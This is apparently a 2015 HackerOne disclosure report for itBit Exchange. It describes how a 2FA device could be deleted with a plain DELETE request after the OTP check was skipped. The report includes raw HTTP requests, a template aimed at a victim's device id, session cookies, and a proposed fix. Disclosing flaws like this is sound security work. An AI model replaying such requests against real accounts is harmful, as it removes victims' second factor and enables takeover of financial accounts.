itBit Exchange: confirmation bypass of 2FA devices while they are deleting

2015-03-19T18:48:31
ID H1:52644
Type hackerone
Reporter defmax
Modified 2015-04-29T10:03:36

Description

hey guys

i just found an logical bug where i could bypass the confirmation of the 2FA devices ,

while deleting an 2FA security device , this is the request made

``` POST /api/user/devices/check_code HTTP/1.1 Host: beta.itbit.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRF-Token: 3a87ae49-78a5-4c8e-8be2-543734823a11 X-Requested-With: XMLHttpRequest Referer: https://beta.itbit.com/profile Content-Length: 60 Cookie: _ga=GA1.2.1225775714.1425494989; hsPagesViewedThisSession=1939571595; __hstc=57227381.14b093bc9c7c6510d16b7274c74de6f8.1426789802053.1426789802053.1426789802053.1; __hssrc=1; __hssc=57227381.1.1426789802053; hsfirstvisit=https%3A%2F%2Fbeta.itbit.com%2F||1426789802050; hubspotutk=14b093bc9c7c6510d16b7274c74de6f8; itBit.b=s%3A646b81e2-046d-40d9-9217-00cf55f688aa.ZkeBj%2FHSZQRdTpy21Y23iBAxvuRuQcHdHn2Xhur757KOmmHBBEymVUC9%2FFg4Uz0tk1eGSU8%2BUqoy%2ByAn5I42MA; itBit.s=s%3A2aceed35-f7ae-4d25-8cbb-9dcff8d8396e.ZGxck5l%2FmemT4WYst%2B64oAN%2Bl5XPRTcRaWsr4Pq3RvQ Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

otpcode=928850&deviceid=9ed975d4-34ba-4057-8e21-db47ef2ccee9 ```

if the otpcode is true it will return and 200 status and it will proceed to DELETE 2FA request , ie

``` DELETE /api/user/devices/9ed975d4-34ba-4057-8e21-db47ef2ccee9 HTTP/1.1 Host: beta.itbit.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-CSRF-Token: 3a87ae49-78a5-4c8e-8be2-543734823a11 X-Requested-With: XMLHttpRequest Referer: https://beta.itbit.com/profile Cookie: _ga=GA1.2.1225775714.1425494989; hsPagesViewedThisSession=1939571595; __hstc=57227381.14b093bc9c7c6510d16b7274c74de6f8.1426789802053.1426789802053.1426789802053.1; __hssrc=1; __hssc=57227381.1.1426789802053; hsfirstvisit=https%3A%2F%2Fbeta.itbit.com%2F||1426789802050; hubspotutk=14b093bc9c7c6510d16b7274c74de6f8; itBit.b=s%3A646b81e2-046d-40d9-9217-00cf55f688aa.ZkeBj%2FHSZQRdTpy21Y23iBAxvuRuQcHdHn2Xhur757KOmmHBBEymVUC9%2FFg4Uz0tk1eGSU8%2BUqoy%2ByAn5I42MA; itBit.s=s%3A2aceed35-f7ae-4d25-8cbb-9dcff8d8396e.ZGxck5l%2FmemT4WYst%2B64oAN%2Bl5XPRTcRaWsr4Pq3RvQ Connection: keep-alive

```

here you can see that this an plain request , ie without any otpcode validating while deleting !

to delete an 2FA device just use this

``` DELETE /api/user/devices/[[2FA_device_id]] HTTP/1.1 Host: beta.itbit.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-CSRF-Token: 3a87ae49-78a5-4c8e-8be2-543734823a11 X-Requested-With: XMLHttpRequest

```

fill the 2FA_device_id , with the victim 2FA id , it will be deleted

fix

just produce an token when otpcode matches with device id , and store in cookie or database , just validate the delete request with that token ,

Hope this bug will be fixed soon

Regards N B